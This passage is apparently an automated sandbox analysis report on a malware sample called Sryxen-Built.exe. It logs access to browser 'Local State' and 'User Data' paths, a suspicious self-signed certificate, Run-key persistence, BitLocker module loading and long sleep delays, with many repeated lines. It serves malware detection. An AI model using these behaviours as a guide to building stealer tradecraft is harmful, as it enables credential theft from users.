Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2*t\*w source: Sryxen-Built.exe, 00000000.00000003.1238412396.0000018D4624C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1240056461.0000018D4624E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1237183020.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236483615.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\* source: Sryxen-Built.exe, 00000000.00000003.1243118243.0000018D4621E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data source: Sryxen-Built.exe, 00000000.00000003.1238559982.0000018D46272000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1236897944.0000018D46271000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Stateemp\*^ source: Sryxen-Built.exe, 00000000.00000003.1247757547.0000018D46214000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1247984734.0000018D4621D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\te source: Sryxen-Built.exe, 00000000.00000003.1250695897.0000018D4625C000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251212121.0000018D4625D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2**q source: Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243044695.0000018D4624F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831al Statee\ source: Sryxen-Built.exe, 00000000.00000003.1231680659.0000018D46223000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1230970491.0000018D46219000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231180277.0000018D46221000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local StateState source: Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D46221000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1238279916.0000018D46223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbtatekageK source: Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46242000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251249271.0000018D46242000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2*e\*_ source: Sryxen-Built.exe, 00000000.00000003.1227554283.0000018D46269000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227428811.0000018D46264000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227402785.0000018D4624B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227568090.0000018D4626D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Stateaate source: Sryxen-Built.exe, 00000000.00000003.1247669206.0000018D4627D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1247609444.0000018D46259000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1248402570.0000018D4627F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdblnkbL( source: Sryxen-Built.exe, 00000000.00000003.1248728348.0000018D461F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State*` source: Sryxen-Built.exe, 00000000.00000003.1250630261.0000018D4626A000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Sryxen-Built.exe, 00000000.00000003.1234737766.0000018D4625D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227446361.0000018D46219000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231861284.0000018D46215000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1231270289.0000018D46214000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309358098.0000018D46284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2es\*0 source: Sryxen-Built.exe, 00000000.00000003.1228120785.0000018D4626B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1228698272.0000018D4626E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1227727003.0000018D46267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb3870112724rsegmnoittet-es.files source: Sryxen-Built.exe, 00000000.00000003.1243135675.0000018D46216000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242964645.0000018D46216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statees\*D source: Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2tate_] source: Sryxen-Built.exe, 00000000.00000003.1309358098.0000018D46284000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310208514.0000018D4628E000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310513841.0000018D4628F000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310086274.0000018D46285000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831r\*? source: Sryxen-Built.exe, 00000000.00000003.1250975899.0000018D46202000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250735027.0000018D461FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*epc source: Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D4621A000.00000004.00000020.00020000.00000000.sdmp
Source: Sryxen-Built.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Sryxen-Built.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Sryxen-Built.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Sryxen-Built.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Sryxen-Built.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B534870 LoadLibraryW,GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,0_2_00007FF67B534870

Persistence and Installation Behavior

barindex
AI detected suspicious PE digital signature
Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple suspicious indicators present: 1) Self-signed certificate where issuer and subject are both simply 'Oracle' without proper organizational details 2) Certificate validation failed with untrusted root certificate error 3) Very long validity period extending to 2039, which is unusual for legitimate certificates 4) While Oracle is a known company, this appears to be an unauthorized use of their name since it lacks proper organizational details and is self-signed 5) Compilation timestamp (Mar 8, 2025) is very recent and closely aligned with signature date (Mar 8, 2025), which is common in malware to appear fresh 6) The simplistic 'CN=Oracle' without additional details like country, organization or email is highly suspicious for a company of Oracle's size and reputation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1328
Source: C:\Users\user\Desktop\Sryxen-Built.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-113317
Source: C:\Users\user\Desktop\Sryxen-Built.exe TID: 3788Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9196Thread sleep time: -8301034833169293s >= -30000s
